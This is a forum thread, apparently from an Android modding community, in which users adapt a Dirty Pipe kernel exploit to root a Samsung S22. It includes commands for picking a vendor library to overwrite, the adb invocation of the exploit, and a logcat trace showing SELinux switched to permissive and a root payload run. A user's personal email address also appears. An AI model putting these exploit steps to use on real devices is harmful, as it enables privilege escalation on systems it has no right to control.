S22

[oakieville]

Could this same method work on s22, i assume it woukd require mymod.ko be built in s22 kernel source but can it work

[polygraphene]

Basically it should work by similar procedure.
Need some modifications like:

1. Fix function offset of libc++.so
2. Choose proper library file to overwrite
3. Build mymod.ko for s22 kernel source

If there is a dev interested in that, I can help them.

[oakieville]

Im interesting to try it i have s22 kernel source as well as the firmware to extract libc++ however i would a good deal of guidance in this

[oakieville]

If would could chat on telegram or whats app that would be great

[oakieville]

if possible contact me please oakieville209@gmail.com

[oakieville]

s22 libc++.so

000403e1 w DF .text 00000030 Base std::__1::basic_streambuf<char, std::__1::char_traits >::basic_streambuf()
000403e1 w DF .text 00000030 Base std::__1::basic_streambuf<char, std::__1::char_traits >::basic_streambuf()

[polygraphene]

Our schedules might not match for chat.

I added auto detection of offset for libc++.so, so the remaining issues are kernel module and libstagefright_soft_mp3dec.so.
kernel module may run other devices without modification. Try it to check if it works.

Target vendor lib (in Pixel 6, libstagefright_soft_mp3dec.so) must have byte 0x57 at offset 0x1000 like following:

$ xxd libstagefright_soft_mp3dec.so|grep 01000:
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__

If you could get firmware image for the device, extract vendor.img on PC and find proper lib with following command:

$ for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
(snip)
vendor/lib/libstagefright_soft_hevcdec.so
vendor/lib/libstagefright_soft_mp3dec.so
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__
vendor/lib/libstagefright_soft_mpeg2dec.so
vendor/lib/libstagefright_soft_mpeg4dec.so
(snip)

If couldn't find proper lib, we should find other methods.

[polygraphene]

After find lib:

adb shell /data/local/tmp/dirtypipe-android -f (Found lib path)

You can also use /vendor/lib64/*.so, but 32bit lib should have small impact on the system.

If you succeed, adb logcat looks like:

03-27 15:30:08.230     1     1 W /system/bin/init: type=1107 audit(0.0:27746): uid=0 auid=4294967295 ses=4294967295 subj=u:r:init:s0 msg='avc: denied { set } for property=a pid=12648 uid=2000 gid=2000 scontext=u:r:shell:s0 tcontext=u:object_r:default_prop:s0 tclass=property_service permissive=0'
03-27 15:30:08.240 12648 12648 W libc    : Unable to set property "a" to "a": error code: 0x18
01-01 09:00:00.1023 12649 12649 I stage2  : pipe_size: 65536
01-01 09:00:00.1023 12649 12649 I stage2  : Wait for child pid=12653
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27747): avc: denied { read } for path="/dev/.dirtypipe-0057" dev="tmpfs" ino=1223 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27748): avc: denied { read } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27749): avc: denied { write } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.343 12653 12653 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27750): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27751): avc: denied { execute } for name="startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27752): avc: denied { read open } for path="/data/local/tmp/startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
01-01 09:00:00.1023 12649 12649 I stage2  : waitid returned with 0. Restore files.
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28232): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28233): avc: denied { getattr } for path="/data/local/tmp/reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=fifo_file permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28234): avc: denied { dac_override } for capability=1 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:vendor_modprobe:s0 tclass=capability permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28235): avc: denied { write } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28236): avc: denied { remove_name } for name="reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1

[elliwigy]

Not sure if it matters but you can run those commands from shell/on the device itself.. If you run:

xxd libstagefright_soft_mp3dec.so|grep 01000
00001000: 695f 6d65 6d63 7079 3400 5f5f 6165 6162  i_memcpy4.__aeab
00010000: 1400 5ae3 f2fa ffda 1500 5ae3 f7fa ff1a  ..Z.......Z.....

and furthermore the other code returns a long list which I will provide shortly.. are we looking for something that contains this exactly:

00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f _aeabi_memcpy.__

[oakieville]

Hey elliwigy how are you doing, ok i will check as you instructrd above i do see that libstagefright_soft_mp3dec.so on s22 doesnt seem to exist there other libstagefright libs there how i have not yet checked offset i will do so later today or tomorrow.

[elliwigy]

These are all the ones it finds:

for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
vendor/lib/android.automotive.watchdog-V2-ndk_platform.so
vendor/lib/android.frameworks.cameraservice.common@2.0.so
vendor/lib/android.frameworks.cameraservice.device@2.0.so
vendor/lib/android.frameworks.cameraservice.device@2.1.so
vendor/lib/android.frameworks.cameraservice.service@2.0.so
vendor/lib/android.frameworks.cameraservice.service@2.1.so
vendor/lib/android.frameworks.cameraservice.service@2.2.so
vendor/lib/android.frameworks.sensorservice@1.0.so
vendor/lib/android.hardware.audio.common-util.so
vendor/lib/android.hardware.audio.common@2.0-util.so
vendor/lib/android.hardware.audio.common@4.0-util.so
vendor/lib/android.hardware.audio.common@4.0.so
vendor/lib/android.hardware.audio.common@5.0-util.so
vendor/lib/android.hardware.audio.common@5.0.so
vendor/lib/android.hardware.audio.common@6.0-util.so
vendor/lib/android.hardware.audio.common@6.0.so
vendor/lib/android.hardware.audio.common@7.0-enums.so
vendor/lib/android.hardware.audio.common@7.0-util.so
vendor/lib/android.hardware.audio.common@7.0.so
vendor/lib/android.hardware.audio.effect@2.0-util.so
vendor/lib/android.hardware.audio.effect@2.0.so
vendor/lib/android.hardware.audio.effect@4.0-util.so
vendor/lib/android.hardware.audio.effect@4.0.so
vendor/lib/android.hardware.audio.effect@5.0-util.so
vendor/lib/android.hardware.audio.effect@5.0.so
vendor/lib/android.hardware.audio.effect@6.0-util.so
vendor/lib/android.hardware.audio.effect@6.0.so
vendor/lib/android.hardware.audio.effect@7.0-util.so
vendor/lib/android.hardware.audio.effect@7.0.so
vendor/lib/android.hardware.audio@2.0-util.so
vendor/lib/android.hardware.audio@2.0.so
vendor/lib/android.hardware.audio@4.0-util.so
vendor/lib/android.hardware.audio@4.0.so
vendor/lib/android.hardware.audio@5.0-util.so
00001000: 5f5a 4e37 616e 6472 6f69 6438 6861 7264  _ZN7android8hard
vendor/lib/android.hardware.audio@5.0.so
vendor/lib/android.hardware.audio@6.0-util.so
00001000: 5f5a 4e37 616e 6472 6f69 6438 6861 7264  _ZN7android8hard
vendor/lib/android.hardware.audio@6.0.so
vendor/lib/android.hardware.audio@7.0-util.so
vendor/lib/android.hardware.audio@7.0.so
vendor/lib/android.hardware.automotive.vehicle@2.0-manager-lib.so
vendor/lib/android.hardware.automotive.vehicle@2.0.so
vendor/lib/android.hardware.biometrics.face@1.0.so
vendor/lib/android.hardware.bluetooth.audio@2.0.so
vendor/lib/android.hardware.bluetooth.audio@2.1.so
vendor/lib/android.hardware.camera.common@1.0.so
vendor/lib/android.hardware.camera.device@1.0.so
vendor/lib/android.hardware.camera.device@3.2.so
vendor/lib/android.hardware.camera.device@3.3.so
vendor/lib/android.hardware.camera.device@3.4.so
vendor/lib/android.hardware.camera.device@3.5.so
vendor/lib/android.hardware.camera.device@3.6.so
vendor/lib/android.hardware.camera.device@3.7.so
vendor/lib/android.hardware.camera.metadata@3.2.so
vendor/lib/android.hardware.camera.metadata@3.3.so
vendor/lib/android.hardware.camera.metadata@3.4.so
vendor/lib/android.hardware.camera.metadata@3.5.so
vendor/lib/android.hardware.camera.metadata@3.6.so
vendor/lib/android.hardware.camera.provider@2.4-legacy.so
vendor/lib/android.hardware.camera.provider@2.4.so
vendor/lib/android.hardware.camera.provider@2.5-legacy.so
vendor/lib/android.hardware.camera.provider@2.5.so
vendor/lib/android.hardware.camera.provider@2.6.so
vendor/lib/android.hardware.cas.native@1.0.so
vendor/lib/android.hardware.cas@1.0.so
vendor/lib/android.hardware.cas@1.1.so
vendor/lib/android.hardware.cas@1.2.so
vendor/lib/android.hardware.gatekeeper@1.0.so
vendor/lib/android.hardware.gnss.measurement_corrections@1.0.so
vendor/lib/android.hardware.gnss.measurement_corrections@1.1.so
vendor/lib/android.hardware.gnss.visibility_control@1.0.so
vendor/lib/android.hardware.gnss@1.0.so
vendor/lib/android.hardware.gnss@1.1.so
vendor/lib/android.hardware.gnss@2.0.so
vendor/lib/android.hardware.gnss@2.1.so
vendor/lib/android.hardware.graphics.composer@2.1.so
vendor/lib/android.hardware.graphics.composer@2.2.so
vendor/lib/android.hardware.graphics.composer@2.3.so
vendor/lib/android.hardware.health@1.0.so
vendor/lib/android.hardware.health@2.0.so
vendor/lib/android.hardware.health@2.1.so
vendor/lib/android.hardware.media.c2@1.0.so
vendor/lib/android.hardware.media.c2@1.1.so
vendor/lib/android.hardware.power@1.0.so
vendor/lib/android.hardware.power@1.1.so
vendor/lib/android.hardware.power@1.2.so
vendor/lib/android.hardware.sensors@1.0.so
vendor/lib/android.hardware.sensors@2.0-ScopedWakelock.so
vendor/lib/android.hardware.sensors@2.0.so
vendor/lib/android.hardware.sensors@2.1.so
vendor/lib/android.hardware.soundtrigger@2.1.so
vendor/lib/android.hardware.soundtrigger@2.2.so
vendor/lib/android.hardware.soundtrigger@2.3.so
vendor/lib/android.hardware.thermal@1.0.so
vendor/lib/android.hardware.thermal@2.0.so
vendor/lib/android.hidl.allocator@1.0.so
vendor/lib/android.hidl.memory.block@1.0.so
vendor/lib/android.system.net.netd@1.0.so
vendor/lib/android.system.net.netd@1.1.so
vendor/lib/audio_common-aidl-cpp.so
vendor/lib/audioclient-types-aidl-cpp.so
vendor/lib/btaudio_offload_if.so
vendor/lib/camera.device@1.0-impl.so
vendor/lib/camera.device@3.2-impl.so
vendor/lib/camera.device@3.3-impl.so
vendor/lib/camera.device@3.4-impl.so
vendor/lib/camera.device@3.5-impl.so
vendor/lib/camx.device@3.2-impl.so
vendor/lib/camx.device@3.3-impl.so
vendor/lib/camx.device@3.4-ext-impl.so
vendor/lib/camx.device@3.4-impl.so
vendor/lib/camx.device@3.5-ext-impl.so
vendor/lib/camx.device@3.5-impl.so
vendor/lib/camx.device@3.6-ext-impl.so
vendor/lib/camx.device@3.6-impl.so
vendor/lib/camx.provider@2.4-external.so
vendor/lib/camx.provider@2.4-impl.so
vendor/lib/camx.provider@2.4-legacy.so
vendor/lib/camx.provider@2.5-external.so
vendor/lib/camx.provider@2.5-legacy.so
vendor/lib/camx.provider@2.6-legacy.so
vendor/lib/cdsp_face.so
vendor/lib/cdsp_face_4.2.so
vendor/lib/com.qti.chiusecaseselector.so
vendor/lib/com.qti.feature2.anchorsync.so
vendor/lib/com.qti.feature2.demux.so
vendor/lib/com.qti.feature2.derivedoffline.so
vendor/lib/com.qti.feature2.frameselect.so
vendor/lib/com.qti.feature2.fusion.so
vendor/lib/com.qti.feature2.generic.so
vendor/lib/com.qti.feature2.gs.cedros.so
vendor/lib/com.qti.feature2.gs.fillmore.so
vendor/lib/com.qti.feature2.gs.sdm865.so
vendor/lib/com.qti.feature2.gs.sm8350.so
vendor/lib/com.qti.feature2.gs.sm8450.so
vendor/lib/com.qti.feature2.hdr.so
vendor/lib/com.qti.feature2.mcreprocrt.so
vendor/lib/com.qti.feature2.memcpy.so
vendor/lib/com.qti.feature2.mfsr.sm8450.so
vendor/lib/com.qti.feature2.mfsr.so
vendor/lib/com.qti.feature2.ml.so
vendor/lib/com.qti.feature2.mux.so
vendor/lib/com.qti.feature2.qcfa.so
vendor/lib/com.qti.feature2.rawhdr.so
vendor/lib/com.qti.feature2.realtimeserializer.so
vendor/lib/com.qti.feature2.rt.so
vendor/lib/com.qti.feature2.rtmcx.so
vendor/lib/com.qti.feature2.serializer.so
vendor/lib/com.qti.feature2.statsregeneration.so
vendor/lib/com.qti.feature2.stub.so
vendor/lib/com.qti.feature2.swmf.so
vendor/lib/com.qti.qseeaon.so
vendor/lib/com.qti.qseeutils.so
vendor/lib/com.qti.settings.fillmore.so
vendor/lib/com.qti.settings.sm8450.so
vendor/lib/com.qti.stats.common.so
vendor/lib/com.qualcomm.mcx.distortionmapper.so
vendor/lib/com.qualcomm.mcx.linearmapper.so
vendor/lib/com.qualcomm.mcx.policy.mfl.so
vendor/lib/com.qualcomm.mcx.policy.xr.so
vendor/lib/com.qualcomm.qti.imscmservice@1.0.so
vendor/lib/com.qualcomm.qti.imscmservice@2.0.so
vendor/lib/com.qualcomm.qti.imscmservice@2.1.so
vendor/lib/com.qualcomm.qti.imscmservice@2.2.so
vendor/lib/com.qualcomm.qti.mcx.usecase.extension.so
vendor/lib/com.qualcomm.qti.uceservice@2.0.so
vendor/lib/com.qualcomm.qti.uceservice@2.1.so
vendor/lib/com.qualcomm.qti.uceservice@2.2.so
vendor/lib/com.qualcomm.qti.uceservice@2.3.so
vendor/lib/framework-permission-aidl-cpp.so
vendor/lib/libAFSegmenter_v1.camera.samsung.so
vendor/lib/libAImode_wrapper.camera.samsung.so
vendor/lib/libAIphoto_core.camera.samsung.so
vendor/lib/libAlacSwDec.so
vendor/lib/libApeSwDec.so
vendor/lib/libBeauty_v4.camera.samsung.so
vendor/lib/libBlurDetectionDeepLearning.camera.samsung.so
vendor/lib/libCB.so
vendor/lib/libDepthBokehVideo_interface.so
vendor/lib/libDeviceInfoProvider.so
vendor/lib/libEGL_adreno.so
vendor/lib/libEventFinder.camera.samsung.so
vendor/lib/libEvrcSwCodec.so
vendor/lib/libFacePreProcessing.camera.samsung.so
vendor/lib/libFaceService.so
vendor/lib/libFace_Landmark_API.camera.samsung.so
vendor/lib/libFastUWDistortionCorrection.camera.samsung.so
vendor/lib/libFlacSwDec.so
vendor/lib/libFrucSSMLib.so
vendor/lib/libGLESv2_adreno.so
vendor/lib/libGPQTEEC_vendor.so
vendor/lib/libGPTEE_vendor.so
vendor/lib/libGPreqcancel.so
vendor/lib/libGPreqcancel_svc.so
vendor/lib/libHDRVerifier_v1.camera.samsung.so
vendor/lib/libHandGesture.camera.samsung.so
vendor/lib/libHprFace_GAE_api.camera.samsung.so
vendor/lib/libHprVisualEffect.so
vendor/lib/libHpr_RecGAE_cvFeature_v1.0.camera.samsung.so
vendor/lib/libHumanSegVideoModel_Vendor.so
vendor/lib/libIDDQD_core.so
vendor/lib/libIMUSensor.so
vendor/lib/libLocalTM_capture_core.camera.samsung.so
vendor/lib/libLocalTM_preview_core.so
vendor/lib/libLocalTM_wrapper.camera.samsung.so
vendor/lib/libMoireDetection.camera.samsung.so
vendor/lib/libMoireDetectionWrapper.camera.samsung.so
vendor/lib/libMoireDetector.uniplugin@1.0.so
vendor/lib/libMoonVerifier_v1.camera.samsung.so
vendor/lib/libObjectDetector_v1.camera.samsung.so
vendor/lib/libOmxCore.so
vendor/lib/libOpenCL.so
vendor/lib/libOpenCv.camera.samsung.so
vendor/lib/libPanDetector.so
vendor/lib/libPersonal_capture.camera.samsung.so
vendor/lib/libPersonal_core.camera.samsung.so
vendor/lib/libPetDetector_interface.so
vendor/lib/libPlaneSegmentationWrapper.so
vendor/lib/libQSEEComAPI.so
vendor/lib/libQTEEConnector_listener.so
vendor/lib/libQTEEConnector_vendor.so
vendor/lib/libQcelp13SwCodec.so
vendor/lib/libRelighting_API.camera.samsung.so
vendor/lib/libSSMAutoTrigger_interface.so
vendor/lib/libSSM_AutoTrigger.so
vendor/lib/libSceneDetector_v1.camera.samsung.so
vendor/lib/libSingleTakeBlurDetection.uniplugin@1.0.so
vendor/lib/libTouchInputVM.so
vendor/lib/libTrustedInput.so
vendor/lib/libTrustedInputTZ.so
vendor/lib/libTrustedUI.so
vendor/lib/libTrustedUITZ.so
vendor/lib/libTrustedUIVM.so
vendor/lib/libVideoSuperNight_interface.so
vendor/lib/lib_SamsungRec_08020.so
vendor/lib/lib_SoundAlive_3DPosition_ver202.so
vendor/lib/lib_SoundAlive_AlbumArt_ver105.so
vendor/lib/lib_SoundAlive_play_plus_ver500.so
vendor/lib/lib_SoundBooster_ver1100.so
vendor/lib/lib_bt_aptx.so
vendor/lib/lib_bt_ble.so
vendor/lib/lib_bt_bundle.so
vendor/lib/lib_lvacfs.so
vendor/lib/libadm.so
vendor/lib/libadreno_app_profiles.so
vendor/lib/libadreno_utils.so
vendor/lib/libadsp_default_listener.so
vendor/lib/libadsprpc.so
vendor/lib/libagm.so
vendor/lib/libagm_compress_plugin.so
vendor/lib/libagm_mixer_plugin.so
vendor/lib/libagm_pcm_plugin.so
vendor/lib/libagmclient.so
vendor/lib/libagmmixer.so
vendor/lib/libaidenoiser.so
vendor/lib/libaivideocentral.arcsoft.so
vendor/lib/libalsautils.so
vendor/lib/libapex_cmn.so
vendor/lib/libapex_utils.so
vendor/lib/libar-acdb.so
vendor/lib/libar-gpr.so
vendor/lib/libar-gsl.so
vendor/lib/libar-pal.so
vendor/lib/libarcsoft_aieffectpk_video.so
vendor/lib/libarcsoft_aieffectpk_video_bokeh.so
vendor/lib/libarcsoft_aieffectpk_video_plight.so
vendor/lib/libarcsoft_dualcam_portraitlighting_preview.so
vendor/lib/libarcsoft_object_tracking.so
vendor/lib/libarcsoft_video_super_night.so
00001000: 5f63 6f6e 645f 6272 6f61 6463 6173 7400  _cond_broadcast.
vendor/lib/libats.so
vendor/lib/libaudio_log_utils.so
vendor/lib/libaudioclient_aidl_conversion.so
vendor/lib/libaudiofoundation.so
vendor/lib/libauto_framing_arcsoft.uniplugin@1.0.so
vendor/lib/libautotracking_interface.so
vendor/lib/libavservices_minijail.so
vendor/lib/libbase64.so
vendor/lib/libbatching.so
vendor/lib/libbatterylistener.so
vendor/lib/libbauthserver.so
vendor/lib/libbauthtzcommon.so
vendor/lib/libbeautyshot.arcsoft.so
vendor/lib/libbitmlengine.so
vendor/lib/libbitmlenginev2.so
vendor/lib/libbluetooth_a2dpsink_session.so
vendor/lib/libbluetooth_audio_session.so
vendor/lib/libbluetooth_audio_session_qti.so
vendor/lib/libbluetooth_audio_session_qti_2_1.so
vendor/lib/libbodyid.arcsoft.so
vendor/lib/libbthost_if.so
vendor/lib/libcacertclient.so
vendor/lib/libcamera2ndk_vendor.so
vendor/lib/libcamera_nn_stub.so
vendor/lib/libcamerapostproc.so
vendor/lib/libcamxcommonutils.so
vendor/lib/libcamxexternalformatutils.so
vendor/lib/libcamxfacialfeatures.so
vendor/lib/libcamxfdalgo.so
vendor/lib/libcamxfdengine.so
vendor/lib/libcamxhwnodecontext.so
vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libcamximageformatutils.so
vendor/lib/libcamxqsatalgo.so
vendor/lib/libcamxsettingsmanager.so
vendor/lib/libcamxstatscore.so
vendor/lib/libcamxswispiqmodule.so
vendor/lib/libcamxswprocessalgo.so
vendor/lib/libcamxtintlessalgo.so
vendor/lib/libcapiv2svacnnvendor.so
vendor/lib/libcapiv2svarnnvendor.so
vendor/lib/libcapiv2uvvendor.so
vendor/lib/libcdfw.so
vendor/lib/libcdfw_remote_api.so
vendor/lib/libcdsp_default_listener.so
vendor/lib/libcdsprpc.so
vendor/lib/libchilog.so
vendor/lib/libchrome.so
vendor/lib/libcne.so
vendor/lib/libcneapiclient.so
vendor/lib/libcneoplookup.so
vendor/lib/libcneqmiutils.so
vendor/lib/libcodec2_hidl@1.0.so
vendor/lib/libcodec2_hidl@1.1.so
vendor/lib/libcodec2_hidl_plugin.so
vendor/lib/libcodec2_simple_component.so
vendor/lib/libcodec2_soft_common.so
vendor/lib/libcodec2_vndk.so
vendor/lib/libcodecsolutionhelper_vendor.so
vendor/lib/libcolor-default.so
vendor/lib/libcom.qti.chinodeutils.so
vendor/lib/libconfigdb.so
vendor/lib/libcpion.so
vendor/lib/libcv_common.so
vendor/lib/libdataitems.so
vendor/lib/libdepth_bokeh_video.uniplugin@1.0.so
vendor/lib/libdiag.so
vendor/lib/libdiagjni.so
vendor/lib/libdigital-dimming.so
vendor/lib/libdisp-aba.so
vendor/lib/libdisplayconfig.qti.so
vendor/lib/libdisplaydebug.so
vendor/lib/libdisplayqos.so
vendor/lib/libdisplayskuutils.so
vendor/lib/libdpps.so
vendor/lib/libdrm.so
vendor/lib/libdrmfs.so
00001000: 5f63 6669 5f63 6865 636b 5f66 6169 6c5f  _cfi_check_fail_
vendor/lib/libdrmtime.so
vendor/lib/libdrmutils.so
vendor/lib/libdsd2pcm.so
vendor/lib/libdsi_netctrl.so
vendor/lib/libdsphist_qc.so
vendor/lib/libdspmc_qc.so
vendor/lib/libdspmc_wrapper.so
vendor/lib/libdsutils.so
vendor/lib/libdualcam_refocus_image.so
vendor/lib/libdualcam_refocus_video.so
vendor/lib/libeffects.so
vendor/lib/libeffectsconfig.so
vendor/lib/libegis_fp_normal_sensor_test.so
vendor/lib/libengine_did.so
vendor/lib/libesesbprovision.so
vendor/lib/libeva.so
vendor/lib/libeva_util.so
vendor/lib/libevent_finder.uniplugin@1.0.so
vendor/lib/libexifa.camera.samsung.so
vendor/lib/libface_landmark.arcsoft.so
vendor/lib/libfast_uwdc.uniplugin@1.0.so
vendor/lib/libfastcvdsp_stub.so
vendor/lib/libfastcvopt.so
vendor/lib/libfidoauthnr_v2.so
vendor/lib/libfilefinder.so
vendor/lib/libfloatingfeature.so
vendor/lib/libfmpal.so
00001000: 5f31 325f 5f76 616c 7565 5f74 7970 6549  _12__value_typeI
vendor/lib/libfocuspeaking.so
vendor/lib/libfocuspeaking.uniplugin@1.0.so
vendor/lib/libformatConverter.unifunc.so
vendor/lib/libgame_enhance.so
vendor/lib/libgaya.so
vendor/lib/libgeofencing.so
vendor/lib/libgf_in_system_lib.so
vendor/lib/libgnss.so
vendor/lib/libgnsspps.so
vendor/lib/libgps.utils.so
vendor/lib/libgpu_tonemapper.so
00001000: 5f00 5f5a 3230 656e 6769 6e65 5f64 656c  _._Z20engine_del
vendor/lib/libgpudataproducer.so
vendor/lib/libgralloc.qti.so
vendor/lib/libgralloc_helper.unifunc.so
vendor/lib/libgralloccore.so
vendor/lib/libgrallocusage.so
vendor/lib/libgrallocutils.so
vendor/lib/libgsl.so
vendor/lib/libhand_interaction.uniplugin@1.0.so
vendor/lib/libhandgesture.arcsoft.so
vendor/lib/libhdcp1prov.so
vendor/lib/libhdcp2p2prov.so
vendor/lib/libhdcpsrm.so
vendor/lib/libhdr10plus.so
vendor/lib/libhdr_backlight_adapter.so
vendor/lib/libhdr_tm.so
vendor/lib/libhdradaptivecustom.so
vendor/lib/libhdrdynamic.so
vendor/lib/libhdrdynamicootf.so
vendor/lib/libhermes.so
00001000: 5f39 616c 6c6f 6361 746f 7249 5335 5f45  _9allocatorIS5_E
vendor/lib/libhidltransport.so
vendor/lib/libhqm_hwparam.so
vendor/lib/libhwbinder.so
vendor/lib/libhypermotion_core.so
vendor/lib/libhypermotion_interface.so
vendor/lib/libhypervintf.so
vendor/lib/libiddqd.uniplugin@1.0.so
vendor/lib/libidl.so
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p
vendor/lib/libimagecodec_native.quram.so
vendor/lib/libipebpsstriping.so
vendor/lib/libipebpsstriping170.so
vendor/lib/libipebpsstriping480.so
vendor/lib/libizat_client_api.so
vendor/lib/libizat_core.so
vendor/lib/libjnihelper.so
vendor/lib/libjpege.so
vendor/lib/libjpegencoder_sw.unifunc.so
vendor/lib/libjpegsq.media.samsung.so
vendor/lib/libjpegsqueezer_sw.unifunc.so
vendor/lib/libjson.so
vendor/lib/libkcl.so
vendor/lib/libkernelmanager.so
vendor/lib/liblbs_core.so
vendor/lib/liblistensoundmodel2vendor.so
vendor/lib/liblivefocus_capture_engine.so
vendor/lib/liblivefocus_capture_interface.so
vendor/lib/liblivefocus_preview_engine.so
vendor/lib/liblivefocus_preview_interface.so
vendor/lib/libllvm-glnext.so
vendor/lib/libllvm-qcom.so
vendor/lib/libllvm-qgl.so
vendor/lib/libloc_api_v02.so
vendor/lib/libloc_api_wds.so
vendor/lib/libloc_core.so
vendor/lib/libloc_socket.so
vendor/lib/libloc_util.so
vendor/lib/liblocation_api.so
vendor/lib/liblocationservice.so
vendor/lib/liblocationservice_glue.so
vendor/lib/liblowi_client.so
vendor/lib/liblx-ar_util.so
vendor/lib/liblx-osal.so
vendor/lib/libmaskdetection.uniplugin@1.0.so
vendor/lib/libmcs.so
vendor/lib/libmctfengine_stub.so
vendor/lib/libmdmdetect.so
vendor/lib/libmdsprpc.so
vendor/lib/libmfGhostDetection.so
vendor/lib/libminkdescriptor.so
vendor/lib/libminksocket_vendor.so
vendor/lib/libmm-hdcpmgr.so
vendor/lib/libmm-omxcore.so
vendor/lib/libmmcamera_bestats.so
00001000: 5f75 0043 636c 616d 7036 345f 7300 4363  _u.Cclamp64_s.Cc
vendor/lib/libmmcamera_cac3.so
vendor/lib/libmmcamera_lscv35.so
vendor/lib/libmmcamera_mfnr.so
vendor/lib/libmmcamera_mfnr_t4.so
vendor/lib/libmmcamera_pdpc.so
vendor/lib/libmpbase.so
vendor/lib/libmulticam_image_optical_zoom.so
vendor/lib/libmulticam_optical_zoom_control.so
vendor/lib/libmulticam_video_optical_zoom.so
vendor/lib/libmultiobject_tracker.so
vendor/lib/libnative-api.so
vendor/lib/libnbaio_mono.so
vendor/lib/libnetmgr.so
vendor/lib/libnetmgr_common.so
vendor/lib/libnetmgr_utils.so
vendor/lib/libnetmgrxfrmutils.so
vendor/lib/liboemaids_vendor.so
vendor/lib/liboemcrypto.so
vendor/lib/libopencv.so
vendor/lib/libopencv3a.so
vendor/lib/libopenvx.so
vendor/lib/libopestriping.so
00001000: 5f6d 696e 696d 616c 005f 5f75 6273 616e  _minimal.__ubsan
vendor/lib/libops.so
vendor/lib/libopus.so
vendor/lib/libos.so
vendor/lib/libpa.so
vendor/lib/libpadm.so
vendor/lib/libpalclient.so
vendor/lib/libpantilt_detector.uniplugin@1.0.so
vendor/lib/libpassese.so
vendor/lib/libpdmapper.so
vendor/lib/libpdnotifier.so
vendor/lib/libperfconfig.so
00001000: 5f5a 4e31 3950 6572 6643 6f6e 6669 6744  _ZN19PerfConfigD
vendor/lib/libperfgluelayer.so
vendor/lib/libperfioctl.so
vendor/lib/libperipheral_client.so
vendor/lib/libpersonalimprinting.uniplugin@1.0.so
vendor/lib/libpet_detector.uniplugin@1.0.so
vendor/lib/libplatformconfig.so
vendor/lib/libpredeflicker_native.so
vendor/lib/libprofileparamstorage.so
vendor/lib/libprotobuf-cpp-full-3.9.1.so
vendor/lib/libprotobuf-cpp-lite-3.9.1.so
vendor/lib/libpsi.so
vendor/lib/libq3dtools_adreno.so
vendor/lib/libqc2audio_base.so
vendor/lib/libqc2audio_basecodec.so
vendor/lib/libqc2audio_core.so
vendor/lib/libqc2audio_hooks.so
vendor/lib/libqc2audio_hwaudiocodec.so
vendor/lib/libqc2audio_platform.so
vendor/lib/libqc2audio_swaudiocodec.so
vendor/lib/libqc2audio_utils.so
vendor/lib/libqc2colorconvertfilter.so
vendor/lib/libqc2filter.so
vendor/lib/libqc2imageformatfilter.so
vendor/lib/libqcbor.so
vendor/lib/libqcc_file_agent.so
00001000: 5f62 6173 6963 5f73 7472 696e 675f 636f  _basic_string_co
vendor/lib/libqcci_legacy.so
vendor/lib/libqcmaputils.so
vendor/lib/libqcodec2_base.so
vendor/lib/libqcodec2_basecodec.so
vendor/lib/libqcodec2_core.so
vendor/lib/libqcodec2_filterbase.so
vendor/lib/libqcodec2_hooks.so
vendor/lib/libqcodec2_mockfilter.so
vendor/lib/libqcodec2_mockqc2filter.so
vendor/lib/libqcodec2_platform.so
vendor/lib/libqcodec2_utils.so
vendor/lib/libqcodec2_v4l2codec.so
vendor/lib/libqdMetaData.so
vendor/lib/libqdcm-algo.so
00001000: 5f5f 7661 6c75 655f 7479 7065 494e 3471  __value_typeIN4q
vendor/lib/libqdcm-json-mode-parser.so
vendor/lib/libqdcm-mode-parser.so
vendor/lib/libqdi.so
vendor/lib/libqdma_file_agent.so
00001000: 5f62 6173 6963 5f73 7472 696e 675f 636f  _basic_string_co
vendor/lib/libqdp.so
vendor/lib/libqdpr.so
